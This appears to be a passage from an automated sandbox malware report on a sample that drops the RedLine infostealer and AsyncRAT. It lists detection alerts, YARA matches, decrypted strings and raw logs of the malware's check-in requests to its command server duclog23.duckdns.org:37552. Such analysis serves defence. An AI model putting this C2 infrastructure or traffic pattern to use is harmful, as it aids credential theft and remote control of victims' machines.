Source: 9.2.Metin.exe.2ccf5a8.0.raw.unpack | String decryptor: USB.exe
Source: 9.2.Metin.exe.2ccf5a8.0.raw.unpack | String decryptor: %AppData%
Source: 9.2.Metin.exe.2ccf5a8.0.raw.unpack | String decryptor: Chrome.exe
Source: f5ATZ1i5CU.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: Binary string: xHPloHC:\Windows\System.ServiceModel.pdb | source: M2.exe, 00000006.00000002.2529308838.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.ServiceModel.pdb|kt | source: M2.exe, 00000006.00000002.2530123513.0000000000789000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdbC | source: M2.exe, 00000006.00000002.2530123513.0000000000789000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.ServiceModel.pdb | source: M2.exe, 00000006.00000002.2569540442.0000000005E5B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdbe | source: M2.exe, 00000006.00000002.2530123513.00000000007E6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb | source: M2.exe, 00000006.00000002.2530123513.0000000000789000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: @xo.pdbService | source: M2.exe, 00000006.00000002.2529308838.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb3v | source: M2.exe, 00000006.00000002.2530123513.00000000007E6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb | source: M2.exe, 00000006.00000002.2530123513.0000000000760000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.ServiceModel.pdb| | source: M2.exe, 00000006.00000002.2530123513.0000000000789000.00000004.00000020.00020000.00000000.sdmp

Networking

Source: Network traffic | Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.10:49740 -> 192.169.69.26:37552
Source: Network traffic | Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.10:49777 -> 192.169.69.26:37552
Source: Network traffic | Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.10:49704 -> 192.169.69.26:37552
Source: Network traffic | Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.10:49813 -> 192.169.69.26:37552
Source: Network traffic | Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.10:49849 -> 192.169.69.26:37552
Source: Network traffic | Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.10:49885 -> 192.169.69.26:37552
Source: Network traffic | Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.10:49923 -> 192.169.69.26:37552
Source: Network traffic | Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.10:49960 -> 192.169.69.26:37552
Source: Malware configuration extractor | URLs: duclog23.duckdns.org
Source: Malware configuration extractor | URLs: duclog23.duckdns.org:37552
Source: unknown | DNS query: name: duclog23.duckdns.org
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 37552
Source: unknown | Network traffic detected: HTTP traffic on port 49740 -> 37552
Source: unknown | Network traffic detected: HTTP traffic on port 49777 -> 37552
Source: unknown | Network traffic detected: HTTP traffic on port 49813 -> 37552
Source: unknown | Network traffic detected: HTTP traffic on port 49849 -> 37552
Source: unknown | Network traffic detected: HTTP traffic on port 49885 -> 37552
Source: unknown | Network traffic detected: HTTP traffic on port 49923 -> 37552
Source: unknown | Network traffic detected: HTTP traffic on port 49960 -> 37552
Source: Yara match | File source: 9.0.Metin.exe.970000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.f5ATZ1i5CU.exe.2e87e58.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.Metin.exe.2ccf5a8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: C:\Users\user\AppData\Roaming\Metin.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\Chrome.exe, type: DROPPED
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: text/xml; charset=utf-8 | SOAPAction: "http://tempuri.org/Endpoint/CheckConnect" | Host: duclog23.duckdns.org:37552 | Content-Length: 137 | Expect: 100-continue | Accept-Encoding: gzip, deflate | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: text/xml; charset=utf-8 | SOAPAction: "http://tempuri.org/Endpoint/CheckConnect" | Host: duclog23.duckdns.org:37552 | Content-Length: 137 | Expect: 100-continue | Accept-Encoding: gzip, deflate | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: text/xml; charset=utf-8 | SOAPAction: "http://tempuri.org/Endpoint/CheckConnect" | Host: duclog23.duckdns.org:37552 | Content-Length: 137 | Expect: 100-continue | Accept-Encoding: gzip, deflate | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: text/xml; charset=utf-8 | SOAPAction: "http://tempuri.org/Endpoint/CheckConnect" | Host: duclog23.duckdns.org:37552 | Content-Length: 137 | Expect: 100-continue | Accept-Encoding: gzip, deflate | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: text/xml; charset=utf-8 | SOAPAction: "http://tempuri.org/Endpoint/CheckConnect" | Host: duclog23.duckdns.org:37552 | Content-Length: 137 | Expect: 100-continue | Accept-Encoding: gzip, deflate | Connection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: duclog23.duckdns.org:37552Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: duclog23.duckdns.org:37552Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: duclog23.duckdns.org:37552Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                        Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                        Source: Joe Sandbox ViewIP Address: 192.169.69.26 192.169.69.26
                        Source: Joe Sandbox ViewIP Address: 192.169.69.26 192.169.69.26
                        Source: Joe Sandbox ViewASN Name: WOWUS WOWUS
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: global trafficDNS traffic detected: DNS query: duclog23.duckdns.org
                        Source: global trafficDNS traffic detected: DNS query: ip-api.com
                        Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: duclog23.duckdns.org:37552Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                        Source: powershell.exe, 00000011.00000002.1610201405.0000022EB86D4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.m2
                        Source: powershell.exe, 00000011.00000002.1611877775.0000022EB877B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.m9
                        Source: powershell.exe, 00000015.00000002.2014615766.0000014745368000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.mic
                        Source: powershell.exe, 00000015.00000002.2014615766.0000014745368000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micft.cMicRosof
                        Source: M2.exe, 00000006.00000002.2543300399.00000000026E4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://duclog23.duckdns.org
                        Source: M2.exe, 00000006.00000002.2543300399.00000000026CF000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.00000000026E4000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002711000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://duclog23.duckdns.org:37552
                        Source: M2.exe, 00000006.00000002.2543300399.00000000026E4000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002631000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002711000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://duclog23.duckdns.org:37552/
                        Source: Metin.exe, 00000009.00000002.2542545307.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp, Metin.exe, 00000009.00000002.2542545307.0000000002CA9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com
                        Source: f5ATZ1i5CU.exe, 00000001.00000002.1271334690.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, Metin.exe, 00000009.00000002.2542545307.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp, Metin.exe, 00000009.00000002.2542545307.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, Metin.exe, 00000009.00000000.1268593061.0000000000972000.00000002.00000001.01000000.00000007.sdmp, Metin.exe.1.dr, Chrome.exe.9.dr | String found in binary or memory: http://ip-api.com/line/?fields=hosting
                        Source: powershell.exe, 00000002.00000002.1317956126.00000000064AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1458473346.000002511007A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1587200548.0000022EAFF96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1759036468.0000028ADAC03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1978946409.000001473CF32000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
                        Source: powershell.exe, 00000015.00000002.1827508906.000001472D0E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: M2.exe, 00000006.00000002.2543300399.0000000002631000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                        Source: powershell.exe, 00000002.00000002.1315390829.0000000005596000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1426509475.000002510022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1516043456.0000022EA01DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1645150628.0000028ACADB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1827508906.000001472D0E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                        Source: M2.exe, 00000006.00000002.2543300399.00000000026E4000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002631000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.00000000026DC000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002711000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                        Source: M2.exe, 00000006.00000002.2543300399.0000000002631000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                        Source: M2.exe, 00000006.00000002.2543300399.0000000002631000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
                        Source: M2.exe, 00000006.00000002.2543300399.0000000002631000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                        Source: powershell.exe, 00000002.00000002.1315390829.0000000005441000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.00000000026CF000.00000004.00000800.00020000.00000000.sdmp, Metin.exe, 00000009.00000002.2542545307.0000000002CA9000.00000004.00000800.00020000.00000000.sdmp, Metin.exe, 00000009.00000002.2542545307.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1426509475.0000025100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1516043456.0000022E9FF21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1645150628.0000028ACAB91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1827508906.000001472CEC1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 00000002.00000002.1315390829.0000000005596000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1426509475.000002510022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1516043456.0000022EA01DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1645150628.0000028ACADB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1827508906.000001472D0E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                        Source: M2.exe, 00000006.00000002.2543300399.00000000026E4000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002631000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.00000000026DC000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002711000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/
                        Source: M2.exe, 00000006.00000002.2543300399.00000000026DC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/0
                        Source: M2.exe, 00000006.00000002.2543300399.0000000002711000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/
                        Source: M2.exe, 00000006.00000002.2543300399.0000000002711000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
                        Source: M2.exe, 00000006.00000002.2543300399.00000000026E4000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002631000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002711000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/CheckConnectLR
                        Source: M2.exe, 00000006.00000002.2543300399.00000000026E4000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002631000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002711000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
                        Source: M2.exe, 00000006.00000002.2543300399.00000000026CF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/CheckConnectT
                        Source: M2.exe, 00000006.00000002.2543300399.00000000026E4000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002631000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002711000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsLR
                        Source: M2.exe, 00000006.00000002.2543300399.00000000026E4000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002631000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002711000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                        Source: M2.exe, 00000006.00000002.2543300399.00000000026E4000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002631000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002711000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesLR
                        Source: M2.exe, 00000006.00000002.2543300399.00000000026E4000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002631000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002711000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                        Source: M2.exe, 00000006.00000002.2543300399.00000000026E4000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002631000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002711000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentLR
                        Source: M2.exe, 00000006.00000002.2543300399.00000000026E4000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002631000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002711000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                        Source: M2.exe, 00000006.00000002.2543300399.00000000026E4000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002631000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002711000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateLR
                        Source: M2.exe, 00000006.00000002.2543300399.00000000026E4000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002631000.00000004.00000800.00020000.00000000.sdmp, M2.exe, 00000006.00000002.2543300399.0000000002711000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                        Source: powershell.exe, 00000015.00000002.1827508906.000001472D0E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: powershell.exe, 0000000E.00000002.1471926630.00000251699EF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.co
                        Source: powershell.exe, 00000002.00000002.1314444524.00000000034AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.co$
                        Source: powershell.exe, 00000015.00000002.2014615766.0000014745368000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.cos
                        Source: powershell.exe, 00000013.00000002.1645150628.0000028ACAB91000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6
                        Source: powershell.exe, 0000000E.00000002.1426509475.0000025100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1516043456.0000022E9FF21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1827508906.000001472CEC1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
                        Source: powershell.exe, 00000002.00000002.1315390829.0000000005441000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
                        Source: f5ATZ1i5CU.exe, 00000001.00000002.1271334690.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, M2.exe, 00000006.00000000.1266996423.00000000002F2000.00000002.00000001.01000000.00000005.sdmp, M2.exe.1.dr | String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                        Source: f5ATZ1i5CU.exe, 00000001.00000002.1271334690.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, M2.exe, 00000006.00000000.1266996423.00000000002F2000.00000002.00000001.01000000.00000005.sdmp, M2.exe.1.dr | String found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
                        Source: powershell.exe, 00000015.00000002.1978946409.000001473CF32000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 00000015.00000002.1978946409.000001473CF32000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 00000015.00000002.1978946409.000001473CF32000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
                        Source: powershell.exe, 00000015.00000002.1827508906.000001472D0E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
                        Source: f5ATZ1i5CU.exe, 00000001.00000002.1271334690.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, M2.exe, 00000006.00000000.1266996423.00000000002F2000.00000002.00000001.01000000.00000005.sdmp, M2.exe.1.dr | String found in binary or memory: https://ipinfo.io/ip%appdata%
                        Source: powershell.exe, 00000002.00000002.1317956126.00000000064AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1458473346.000002511007A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1587200548.0000022EAFF96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1759036468.0000028ADAC03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1978946409.000001473CF32000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe

                        Operating System Destruction

                        Source: C:\Users\user\AppData\Roaming\Metin.exe | Process information set: 01 00 00 00

                        System Summary

                        Source: 9.0.Metin.exe.970000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT | Author: ditekSHen
                        Source: 1.2.f5ATZ1i5CU.exe.2e87e58.1.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT | Author: ditekSHen
                        Source: 1.2.f5ATZ1i5CU.exe.2e87e58.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT | Author: ditekSHen
                        Source: 9.2.Metin.exe.2ccf5a8.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT | Author: ditekSHen
                        Source: 9.2.Metin.exe.2ccf5a8.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT | Author: ditekSHen
                        Source: 6.0.M2.exe.2f0000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb | Author: unknown
                        Source: 6.0.M2.exe.2f0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer | Author: ditekSHen
                        Source: 00000009.00000002.2542545307.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT | Author: ditekSHen
                        Source: 00000009.00000000.1268593061.0000000000972000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT | Author: ditekSHen
                        Source: 00000006.00000000.1266996423.00000000002F2000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_f54632eb | Author: unknown
                        Source: 00000001.00000002.1271334690.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_f54632eb | Author: unknown
                        Source: 00000001.00000002.1271334690.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT | Author: ditekSHen
                        Source: Process Memory Space: f5ATZ1i5CU.exe PID: 7928, type: MEMORYSTR | Matched rule: Windows_Trojan_RedLineStealer_f54632eb | Author: unknown
                        Source: Process Memory Space: M2.exe PID: 8096, type: MEMORYSTR | Matched rule: Windows_Trojan_RedLineStealer_f54632eb | Author: unknown
                        Source: C:\Users\user\AppData\Roaming\Metin.exe, type: DROPPED | Matched rule: Detects AsyncRAT | Author: ditekSHen
                        Source: C:\Users\user\AppData\Roaming\Chrome.exe, type: DROPPED | Matched rule: Detects AsyncRAT | Author: ditekSHen
                        Source: C:\Users\user\AppData\Roaming\M2.exe, type: DROPPED | Matched rule: Windows_Trojan_RedLineStealer_f54632eb | Author: unknown
                        Source: C:\Users\user\AppData\Roaming\M2.exe, type: DROPPED | Matched rule: Detects RedLine infostealer | Author: ditekSHen
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0361B570
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0361F635
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0361F6BD
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0361B550
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_08EE3E98
                        Source: C:\Users\user\AppData\Roaming\M2.exe | Code function: 6_2_024CE7B0
                        Source: C:\Users\user\AppData\Roaming\M2.exe | Code function: 6_2_024CDC90
                        Source: C:\Users\user\AppData\Roaming\Metin.exe | Code function: 9_2_00007FF7C14116A9
                        Source: C:\Users\user\AppData\Roaming\Metin.exe | Code function: 9_2_00007FF7C14122C1
                        Source: C:\Users\user\AppData\Roaming\Metin.exe | Code function: 9_2_00007FF7C1419DE1
                        Source: C:\Users\user\AppData\Roaming\Metin.exe | Code function: 9_2_00007FF7C1416DA2
                        Source: C:\Users\user\AppData\Roaming\Metin.exe | Code function: 9_2_00007FF7C1415FF6
                        Source: C:\Users\user\AppData\Roaming\Metin.exe | Code function: 9_2_00007FF7C14112E8
                        Source: C:\Users\user\AppData\Roaming\Metin.exe | Code function: 9_2_00007FF7C1412029
                        Source: C:\Users\user\AppData\Roaming\Metin.exe | Code function: 9_2_00007FF7C1419DE1
                        Source: C:\Users\user\AppData\Roaming\Chrome.exe | Code function: 27_2_00007FF7C14416A9
                        Source: C:\Users\user\AppData\Roaming\Chrome.exe | Code function: 27_2_00007FF7C1442029
                        Source: C:\Users\user\AppData\Roaming\Chrome.exe | Code function: 30_2_00007FF7C14216A9
                        Source: C:\Users\user\AppData\Roaming\Chrome.exe | Code function: 30_2_00007FF7C1422029
                        Source: C:\Users\user\AppData\Roaming\Chrome.exe | Code function: 31_2_00007FF7C14216A9
                        Source: C:\Users\user\AppData\Roaming\Chrome.exe | Code function: 31_2_00007FF7C1422029
                        Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Roaming\Chrome.exe 08A5AB51F8EEE96D3837AAEF4D74BF672D937056118003ECFA0E4DF9DAE49125
                        Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Roaming\M2.exe 00A709BACA231F15267526D7B5DB11CD94B0089ED6CFD1667A1FF2EBD584C266
                        Source: f5ATZ1i5CU.exe, 00000001.00000002.1271334690.0000000002E70000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameImplosions.exe4 vs f5ATZ1i5CU.exe
                        Source: f5ATZ1i5CU.exe, 00000001.00000002.1271334690.0000000002E70000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMetin.exe4 vs f5ATZ1i5CU.exe
                        Source: f5ATZ1i5CU.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                        Source: 9.0.Metin.exe.970000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 1.2.f5ATZ1i5CU.exe.2e87e58.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 1.2.f5ATZ1i5CU.exe.2e87e58.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 9.2.Metin.exe.2ccf5a8.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 9.2.Metin.exe.2ccf5a8.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
